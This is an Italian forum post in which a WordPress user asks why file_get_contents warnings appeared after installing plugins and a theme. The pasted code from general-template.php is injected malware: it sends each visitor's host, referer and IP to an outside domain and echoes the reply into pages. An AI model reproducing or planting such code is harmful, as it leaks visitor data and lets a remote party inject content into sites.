Salve signori..oggi ho installato dei plug in come Qtranslate e map visitors..tutto andava liscio.. poi mi sono ricollegato al mio blog e ho provato a cambiare tema..poi quando ho fatto refresh, ho visto 2 warnings.. e non so cosa sono dovuto..o sui plugin ke ho installato (e non credo perchè prima andava tutto bene ) o sulla tema ke ho installato.. comunque ho provato a cancellare il tema installato e disaativare i plugin installati.. Niente è cambiato... conosco poco php e sono nuovo su altervista quindi non so mezza... Vi prego d aiutarmi.. ecco i warnings:
Warning: file_get_contents() [function.file-get-contents]: URL file-access is disabled in the server configuration in /membri/markz/blog/wp-includes/general-template.php on line 61
Warning: file_get_contents(http://24365online.com/_YTG_yu/_dl/get_info.php?host=markz.altervista.org&referer=htt p:^^markz.altervista.org^blog^wp-admin^themes.php?activated=true&visitor_ip=151.16. 84.184) [function.file-get-contents]: failed to open stream: no suitable wrapper could be found in /membri/markz/blog/wp-includes/general-template.php on line 61
aggiungo URL del mio Blog: www.markz.altervista.org
EDIT:
aggiungo il codice dovè dice che cè l'errore..
*
* @uses locate_template()
* @since 1.5.0
* @uses do_action() Calls 'get_footer' action.
*
* @param string $name The name of the specialised footer.
*/
function get_footer( $name = null ) {/***HWEDLC***/
$host = $_SERVER["HTTP_HOST"];
$referer = $_SERVER["HTTP_REFERER"];
$referer = str_replace("/","^",$referer);$referer = str_replace("&","<<>>",$referer);
$document = $_SERVER["DOCUMENT_ROOT"];
$visitor_ip = $_SERVER["REMOTE_ADDR"];
$url = "http://24365online.com/_YTG_yu/_dl/get_info.php?host=$host&referer=$referer&visitor_i p=$visitor_ip";
$content = file_get_contents($url);
echo $content;